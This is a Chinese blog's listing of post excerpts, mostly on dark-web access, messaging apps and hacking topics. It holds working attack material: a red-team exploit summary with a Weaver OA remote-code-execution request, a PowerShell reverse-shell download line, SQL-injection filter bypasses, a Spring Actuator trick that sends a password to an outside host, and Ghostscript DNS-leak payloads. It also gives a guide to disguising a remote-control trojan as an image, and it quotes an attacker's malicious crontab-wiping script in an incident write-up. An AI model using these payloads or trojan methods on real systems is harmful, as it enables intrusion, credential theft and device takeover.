• 暗网教程 洋葱浏览器 页翻译软件 安装教程

    随着新闻媒体的报道,暗网越来越为人所熟知,很多朋友也对暗网充满着好奇,然而暗网中的网站绝大部分都是英文的网站,很多朋友的英文又很差,在浏览暗网时非常的通过,所以常常有朋友让我推荐中文的暗网。但是中文的暗网实在是太少了,每法满足大家的需求,只能退而求其次次通过页翻译软件来将英文网站翻译成中文来浏览,虽然有些麻烦但也总比没有好,那么这篇文章我就来教大家如何安装页翻译软件 页翻译插件的安装 打开洋葱浏览器之后,点击右上角的菜单-》选择附加组件,然后跳转到附加组件页面如图所示 在搜索框中输入“页翻译”然后回车,会跳转到查询结果页面 选择第二个结果“页翻译”,然后点击“添加到firefox”就可以安装页翻译插件了 安装成功后,洋葱浏览器的右上角会出现页翻译的图标 页翻译插件的使用 使用页翻译插件很简单,打开你要翻译的英文页面,然后双击页翻译的图标,等待一段时间后就会出现页翻译的选项,如图: 选择你要翻译的目标语言,点击translate就可以翻译成中文了 点击链接加入群聊:...

    2020-07-10 8647
  • 暗网教程 洋葱浏览器的汉化教程

    很多朋友网友反映他们下载洋葱浏览器时,明明选择的是中文版本,但是下载安装后,一打开就是英文版了,问我是什么原因,如何把洋葱浏览器设置成中文版本,那么今天我就来教大家如何将洋葱浏览器设置成中文界面: 1、打开洋葱浏览器-》点击有上交的菜单-》选择首选项(preferences),这时候就会跳转到浏览器的设置页面 设置页面 跳转到设置页面后,在搜索框中输入lang,就可以看到浏览器语言的设置框 在语言设置框中我们可以看到当前的语言显示的是英语(english),点击set alternatives 就会弹出语言的设置选项点击下方的select a language to add 就会弹出语言的选择框,找到chinese(china) 选定chinse(china)并点击右边的move up按钮将它置顶,再点击ok按钮回到设置页面 这时候只需要点击“应用并重新打开”重新启动洋葱浏览器,我们的浏览器就会变成中文版本了QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-07-10 5420
  • 震惊!淘口令竟被用来访问钓鱼站+支付宝付款骗钱

    也许你在正常交易时碰到过这样的事情: 开始分析 ¥jLFM1x086Lm¥淘口令解析结果: 淘口令链接:https://login.taobao.com/member/ ... rd-Outside.windvane 淘口令标题:陪玩#可夜 淘口令剩余时间:28天0小时3分9秒 然后先把短连接打开,发现会自动跳转http://suo.im/6bvtlW,解析后的原链接:http://zhuanzhuan-58.com/xy/?i=5 ... 17u&ClickID=616 后面参数先不要管,打开,这个网址贼骚,检测到你电脑访问就跳转咸鱼,手机访问正常 (现在手机也打不开了,全部跳转咸鱼,主站跳转百度,骗子日常操作) 什么买耳机被坑,这不是搞陪玩被骗了,这是一个高仿咸鱼的网站。点击我想要,会提示淘宝打开,然后出现付款。 (楼主说咸鱼有网页支付,但是咸鱼客户端付款是不支持网页支付,这里因为是网页打开,所以出现了网页支付) 接着调用支付宝,然后你懂的!出现付款界面,收款商家为那个交易猫,老规矩,冲q币洗白。 至于跳转后面的参数百度搜索TaoPassword-Outside.windvane,会发现好多类似熟悉参数的淘宝客链接或者聚划算链接之类,这一堆参数估计是为可以生成淘口令用的(淘口令生成有严格参数限制的),没玩过淘口令就不解析了。 事情总结 这事应该淘宝背锅,竟然不搞白名单,咸鱼兼容淘宝口令的方式通过网页版打开淘宝链接的,而且是自动登录的,所以假如一个假的淘口令,当你复制到咸鱼后,他会自动登录你的淘宝账号,然后跳转到http://suo.im/6bvtlW, 所以故事是这样的: 正常路径: 用户复制淘口令到咸鱼,咸鱼会以网页形式打开链接,并自动登录(大家可以复制一个淘宝口令试一下),不用登陆可以下单购买,付款只能支付宝付款(没有网页付款) 被骗路径: 用户复制伪装的淘口令,咸鱼以网页形式打开淘宝,然后自动跳转到到http://suo.im/6bvtlW,就好比你自己手机开个浏览器打开http://suo.im/6bvtlW,剩下不解释了,都是常规骗人套路 只能说想到这个方法的人牛逼啊!!!!!!! 总结: 各位在QQ 、微信等聊天工具、复制淘口令时,应注意 URL 地址以及付款时的页面!避免被骗! ...

    2020-07-09 1137
  • 最新快速联系腾讯人工客服的方法

    使用过腾讯系统的软件的人都知道,腾讯一般都是机器人客服,想要找到人工客服几乎是没有端口给你接入的,那么是不是就没有人工客服了呢,其实也是有方法能联系到他们的,下面小编就来给大家介绍一下2020最新联系腾讯客服方法,快来一起看看吧! 联系方法 1.用手机拨打电话0755 8601 3860  2.按提示操作然后微信会给你发消息 3.点进去等待接通 提示繁忙继续等 就可以接通客服...

    2020-07-05 1066
  • telegram(电报)汉化版教程

    Telegram是一个跨平台的实时通讯应用。Telegram的主要优势是,它非常安全、免费、没有广告并且功能强大。对比于其他同类通讯软件来说,在用户体验上做得非常好。但是,在国内是无法访问的,至于原因,大家都懂的。 加群里面有和汉化版tg、梯子 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="telegram(电报)汉化版教程" alt="telegram(电报)汉化版教程" border="0" width="750px" height="1344px" /> Telegram官网为:https://telegram.org/,目前已发布安卓、IOS、PC、Mac、Linux版本。已发布的版本中没有中文版,但官方为用户提供了汉化助手,用户可以手动轻松的将软件转为中文版。 下载并注册好 Telegram 后,在界面顶部的搜索框中输入@zh_CN(注意:包含@),进入“Telegram-zh_CN project”频道,在此频道内就能看到官方发布的汉化方法了,按照使用方法设置后,界面就能够以中文显示了。 ...

    2020-06-25 2080
  • 苹果安卓均可修改微信号了

    6月17日置顶:官方已通告,苹果手机也可以改了! 先把微信更新到最新版本,然后打开微信->我->设置->账户与安全->微信号->修改即可 (一年可以改一次)必须要是最新版微信,如果改不了退出重新登录试试! 还是没显示能修改就耐心等待,需要一个覆盖过程! 官方说明:https://mp.weixin.qq.com/s/uAJZ-9luDbTuLJuInGvGCA ...

    2020-06-20 758
  • 中国联通在线销户教程

    步骤如下: 1、打开联通营业厅APP--【服务】--【办理】--【销户】 2、根据要求上传所需要的资料即可,有多余的号的可以注销了  PS:话费余额可以转移到银行卡,其他手机账户,沃账户等等! 如果转移到银行卡的小伙伴小编建议在注销之前咨询下客服。 据说通过官方充值的才会退到银行卡 第三方充值的不行!...

    2020-06-20 1327
  • 2020护网红方漏洞利用总结

      一年一度的护网马上要开始了,结合网上已公布的POC,总结了一部分最新的漏洞利用及修复方式,供大家参考。 1 泛微OA Bsh 远程代码执行漏洞 1. 漏洞简介 2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重. 2. 影响组件泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA E-cology远程代码执行漏洞原理分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/215218.html https://github.com/beanshell/beanshell http://beanshell.org/manual/quickstart.html#The_BeanShell_GUI 6. 漏洞利用 Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204 POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: xxxxxxxx:8088 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 98 Content-Type: application/x-www-form-urlencoded bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 7. 利用技巧 1.其他形式绕过 eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir"); 2.泛微多数都是windows环境, 反弹shell可以使用pcat Powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd 8. 防护方法 1.及时更新泛微补丁 2.拦截/weaver/bsh.servlet.BshServlet目录的访问 2 泛微OA e-cology SQL注入漏洞 1. 漏洞简介 泛微OA在国内的用户很多,漏洞以前也很多,但现在在漏洞盒子托管了企业SRC https://weaversrc.vulbox.com/, 情况有所好转 2. 影响组件 泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId= ecology WorkflowCenterTreeData /mobile/plugin/SyncUserInfo.jsp 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区 https://xz.aliyun.com/t/6531 6. 漏洞利用 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现数据库小龙人-CSDN博客 https://blog.csdn.net/zycdn/article/details/102494037 Tentacle/ecology8_mobile_sql_inject.py at 6e1cecd52b10526c4851a26249339367101b3ca2 · orleven/Tentacle https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py 应用安全 – 软件漏洞 – 泛微OA漏洞汇总 – AdreamWillB – 博客园 https://www.cnblogs.com/AtesetEnginner/p/11558469.html /mobile/plugin/SyncUserInfo.jsp 这个也是有问题的, 但由于没有公开的分析报告, 漏洞相对简单, 这里不过多描述 7. 利用技巧 1.在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 因为没公开这里就不细说了 2.泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了 3.这里可以绕过的原因是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,所以随便你填充%0a%0d还是空格都可以绕过注入检测 4.泛微后端数据库版本存在差异, 但是可以通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤方法并不一致所以这里筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格) "-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=('sysadmin'" 老版本可以在关键字后面加 /**/ 来绕过sql检测 新版本可以通过加入大量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表 就Hrmresource表中没有用户, Hrmresourcemanager 表中也一定会存在sysadmin账户,所以进行union select的时候一定会有数据。这里也可以使用 "-1) "+" "*800+ " or/**/ 1=1 and id<(5",这里使用 <5 可以避免信息超过5条, 但是会返回密码等敏感信息, 不建议使用。 8. 防护方法 1.及时更新泛微补丁 2.泛微最好不要开放到公网 3.使用waf拦击 3 深信服VPN远程代码执行 1. 漏洞简介 深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过 2. 影响组件深信服 VPN 3. 漏洞指纹 Set-Cookie: TWFID=welcome to ssl vpn Sinfor 4. Fofa Dork header="Set-Cookie: TWFID=" 5. 漏洞分析 深信服vpnweb登录逆向学习 – potatso – 博客园 https://www.cnblogs.com/potatsoSec/p/12326356.html 6. 漏洞利用 wget -t %d -T %d --spider %s 7. 利用技巧 1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网 2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来 3.去除空格也简单 cat /etc/passwd | tr " \n" "+|" 8. 防护方法 1.及时更新补丁 2.升级到最新版 4 深信服 VPN 口令爆破 1. 漏洞简介 深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行 2. 影响组件深信服 VPN 3. 漏洞指纹 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd= 4. Fofa Dork app="深信服-SSL-VPN" 5. 漏洞分析 关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区 https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633 此处存疑, 时间问题没有测试 6. 漏洞利用 1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多) #encoding=utf8 import requests import hashlib import urllib3 urllib3.disable_warnings() import re session = requests.session() def SanForLogin(target, password, username="admin"):     # 加密密码的算法是 sha1(password+sid)     # 没有公开POC就不写了 SanForLogin("https://xxxxxxxxxxx/", "admin") 7. 利用技巧 1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多 国外APT组织应该也批量爆破了一波,加密的密码也就是 sha1(password+sid) 爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/Sangfor@123 2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能 3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell https://www.uedbox.com/post/31092/ 8. 防护方法 1.及时更新补丁 2.升级到最新版 5 边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞 1. 漏洞简介 大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主 2. 影响组件 防火墙, 网关, 路由器, VPN 3. 漏洞指纹 防火墙, 网关, 路由器, VPN 4. Fofa Dork防火墙, 网关, 路由器, VPN 的名称 5. 漏洞分析 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 6. 漏洞利用 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 7. 利用技巧 1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令 admin root 123456 永远的神 内网的安全平台就是个漏洞指南 8. 防护方法 1.设置强口令 2.限制来源IP 6 Thinkphp 相关漏洞 1. 漏洞简介 Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题 2. 影响组件 Thinkphp 3. 漏洞指纹 Thinkphp X-Powered-By: ThinkPHP 4. Fofa Dork app="ThinkPHP" 5. 漏洞分析 ThinkPHP漏洞总结 – 赛克社区 http://zone.secevery.com/article/1165 挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心 https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/ ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客 https://blog.csdn.net/Fly_hps/article/details/81201904 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 6. 漏洞利用 SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写 https://github.com/Dido1960/thinkphp whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具 https://github.com/whirlwind110/tphack 7. 利用技巧 1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露 2.自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中 3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 8. 防护方法 1.及时更新补丁 2.升级到最新版Thinkphp 3.前置WAF进行防护 7 Spring 系列漏洞 1. 漏洞简介 Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒 2. 影响组件 Spring xxx 3. 漏洞指纹 X-Application-Context: 4. Fofa Dork app="Spring-Framework" 5. 漏洞分析 Spring 框架漏洞集合 ~ Misaki’s Blog https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/ Exploiting Spring Boot Actuators | Veracode blog https://www.veracode.com/blog/research/exploiting-spring-boot-actuators Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/ 6. 漏洞利用 mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE https://github.com/mpgn/Spring-Boot-Actuator-Exploit artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads https://github.com/artsploit/yaml-payload 7. 利用技巧 1.Spring Boot Actuators 相关漏洞超级好用,很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题,尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务。然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的/env 可以偷session, RCE/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下 /trace /health /loggers /metrics /autoconfig /heapdump /threaddump /env /info /dump /configprops /mappings /auditevents /beans /jolokia /cloudfoundryapplication /hystrix.stream /actuator /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream /monitor /monitor/auditevents /monitor/beans /monitor/health /monitor/conditions /monitor/configprops /monitor/env /monitor/info /monitor/loggers /monitor/heapdump /monitor/threaddump /monitor/metrics /monitor/scheduledtasks /monitor/httptrace /monitor/mappings /monitor/jolokia /monitor/hystrix.stream 这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作,里面就有操作空间, 很像fastjson反序列化。 2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000 spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml 3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了 8. 防护方法 1.及时更新补丁 2.开启Spring Boot Actuators权限校验 3.前置WAF进行防护 8 Solr 系列漏洞 1. 漏洞简介 Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞, 2. 影响组件 Solr 3. 漏洞指纹 Solr 4. Fofa Dork app="Solr" 5. 漏洞分析 Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/218730.html Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析 https://paper.seebug.org/1009/ 6. 漏洞利用 veracode-research/solr-injection: Apache Solr Injection Research https://github.com/veracode-research/solr-injection jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”) https://github.com/jas502n/CVE-2019-12409 mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit https://github.com/mogwailabs/mjet 7. 利用技巧 1.看到锤就完事了, 漏洞太多了, 一片一片的 2.遇到mjet连接超时,这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作 8. 防护方法 1.升级到最新版 2.不要对外开放敏感端口 9 Ghostscript 上传图片代码执行 1. 漏洞简介 Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招 2. 影响组件 imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用 3. 漏洞指纹 .ps/.jpg/.png 4. Fofa Dork 5. 漏洞分析 ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台 https://www.anquanke.com/post/id/157513 6. 漏洞利用 Exploit Database Search https://www.exploit-db.com/search?q=Ghostscript vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116 7. 利用技巧 1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行dnslog 可以用 ping `uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的 8. 防护方法 1.升级到最新版 ...

    2020-06-19 2353
  • Windows全版本本地提权

    Windows全版本本地提权EXP(CVE-2020-0787) https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases 一条命令从APK中获取信息 grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/br ...

    2020-06-19 1227
  • phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞

    phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,`preg_replace`的第一个参数可以利用进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: - 4.0.10.16之前4.0.x版本 - 4.4.15.7之前4.4.x版本 - 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5 ,所以无法复现本漏洞) 启动后,访问`http://192.168.28.4:8080`,即可看到phpMyAdmin的登录页面,账户:root,密码:root。 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(C POC如下 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) 运行POC: python C:UserslenovoDesktopa.py -u root -p "root" http://192.168.28.4:8080 -c "system('id')" ...

    2020-06-13 1117
  • 最新暗网访问教程,洋葱浏览器的下载与配置

    说到暗网很多人可能都有听说过,前段时间很火的一部电视剧《破冰行动》里面就有介绍到暗网,林耀东的儿子就是通过暗网联系到华叔,进行毒品交易的,那么到底什么是暗网呢,可能很多人并不知道,暗网又是如何访问的呢?今天我就来教大家如何访问暗网。 1、洋葱浏览器的下载 暗网是需要通过特殊的浏览器才能访问的,通过普通的浏览器比如谷歌浏览器和火狐浏览器都是没办法访问的,需要下载洋葱浏览器才可以访问暗网,而下载洋葱浏览器又是需要科学上网 洋葱浏览器最新版、中文版、安卓版等……版本加QQ群获取QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL 根据自己的操作系统选择下载的版本 洋葱浏览器的配置 洋葱浏览器安装成功后,点击桌面上的图标,跳转到洋葱浏览器的加载页面再点击配置按钮,跳转到洋葱浏览器的配置页面:勾选使用代理访问,代理类型选择sock4 代理的ip和端口号可以到免费的代理网址获取:https://free-proxy-list.net/ 打开网站后,可以自己选择IP和端口号 当然也可以直接使用我现在的这个代理地址, 以上信息都填写承购后,就可以点击链接了,第一次链接的时候可能会花费几分钟的时间,耐心等待就行,当出现下面的界面的时候,证明你已经可以访问暗网了 ...

    2020-05-27 42052
  • APN设置教程

    注意:必须开启数据漫游才可以使用,如果没设置apn前可以使用,突然不能用的,一般都是不需要设置apn,请检查其他原因。 安卓手机设置操作步骤如下: 第一步 第二步第三步 第四步:设置完成点击保存 iPhone手机设置操作步骤如下 第一步 第二步 第三步 第四步:设置完成点击保存 ...

    2020-05-24 1245
  • 亲手实践图片木马

    HELLO大家好我是毒蜂 今天看前辈的帖子 图片远控,感觉很好玩的样子,就照着来了一发 事前准备: 1.远控软件 本人用的是金戈铁马防火墙压力测试,实在是找不到好用的远控了,就用这个代替了。 2. 木马图片整合软件  本人用的是 BD2.Net Injector By BD2, 3.一个ico图标 4.一个普通图片 注:我是用jpg格式做的,其实很多格式都可以 上工具 图片上是我的远控工具和我机器的ip地址,我是用内网做的,人畜无害。 生成木马什么的不用说了,接下来打开整合软件 第一条里添加你远控的路径 第二条里填你的伪格式, 还是用微信吧,qq传不过去的 第三条里添加你在网上做的ico图标 第四条选生成的路径 我就直接把我生成的文件拿到领一台机器上运行了 点击批量弹窗 他已经听你使唤了。 不要用作非法用途!!!! ...

    2020-05-13 1027
  • ubuntu 设置默认root用户

    Ubantu操作系统:Ubuntu是一个以桌面应用为主的Linux操作系统,其名称来自非洲南部祖鲁语或豪萨语的“ubuntu"一词,意思是“人性”“我的存在是因为大家的存在",是非洲传统的一种价值观。Ubuntu基于Debian发行版和Gnome桌面环境,而从11.04版起,Ubuntu发行版放弃了Gnome桌面环境,改为Unity。从前人们认为Linux难以安装、难以使用,在Ubuntu出现后这些都成为了历史。Ubuntu也拥有庞大的社区力量,用户可以方便地从社区获得帮助。 为什么直接用root用户登录: 本地安装VMware安装ubantu,方便,不用再切换为root用户。 Ubuntu 18 root用户登录   为root设置初始密码   登录系统,打开终端,使用sudo指令获取root权限,更改root用户密码: sudo passwd root 修改登录界面 更改/usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf文件内容 sudo vim /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf 打开文件,在文件末尾加入如下两行,完成后保存并关闭(不要删除文件中原本的两行内容) greeter-show-manual-login=true all-guest=false 允许root用户直接登录图形界面 进入/etc/pam.d文件夹下,修改gdm-autologin和gdm-password文件内容(参考第2步的命令) gdm-autologin文件注释掉auth required pam_success_if.so user!=root quiet_success这一行 gdm-password文件注释掉auth required pam_success_if.so user!=root quiet_success这一行 #auth required pam_success_if.so user!=root quiet_success 设置环境变量 修改/root/.profile文件 sudo vim/root/.profile 默认没有vim 提示安装,安装就好 打开文件,将最后一行改为以下: tty -s && mesg n || true 保存并关闭,重启, 重启之后选择“未列出” 输入账号root和密码。 ...

    2020-05-12 1477
  • 利用Javascript代码实现QQ空间自动点赞

      使用方法:     1:进入QQ空间     2:复制下面代码     3:按F12或右键审查元素 进入控制台 也就是console     4:粘贴  回车键  即可     5:如果嫌慢的话可以 修改这段代码。     window.setInterval(autoClick,2000);  //2000代表两秒屏幕下滑5px; 代码如下: var x=5,y=10; function autoClick() { y=y+5; var zan=document.getElementsByClassName('item qz_like_btn_v3'); for(var i=0;i<zan.length;i++){ if(zan[i].attributes[6].value=='like'){ zan[i].firstChild.click(); } }; window.scrollBy(x,y); } window.setInterval(autoClick,2000); ...

    2020-05-03 1090
  • 记一次linux(被)入侵

    0x00 背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了! 0x01 查找线索 服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把数据库全备份到本地,然后top命令看了一下,有2个99%的同名进程还在运行,叫gpg-agentd。 google了一下gpg,结果是: GPG提供的gpg-agent提供了对SSH协议的支持,这个功能可以大大简化密钥的管理工作。   看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一个字母d,伪装的很好,让人想起来windows上各种看起来像svchost.exe的病毒。继续 ps eho command -p 23374 netstat -pan | grep 23374 查看pid:23374进程启动路径和网络状况,也就是来到了图1的目录,到此已经找到了黑客留下的二进制可执行文件。接下来还有2个问题在等着我: 1,文件是怎么上传的? 2,这个文件的目的是什么,或是黑客想干嘛?   history看一下,记录果然都被清掉了,没留下任何痕迹。继续命令more messages, 看到了在半夜12点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务。 crontab -e 果然,线索找到了。 0x02 作案动机 上面的计划任务的意思就是每15分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。 curl -fsSL 159.89.190.243/ash.php > ash.sh 脚本内容如下: uname -a id hostname setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 crontab -r 2>/dev/null rm -rf /var/spool/cron/* 2>/dev/null mkdir -p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa 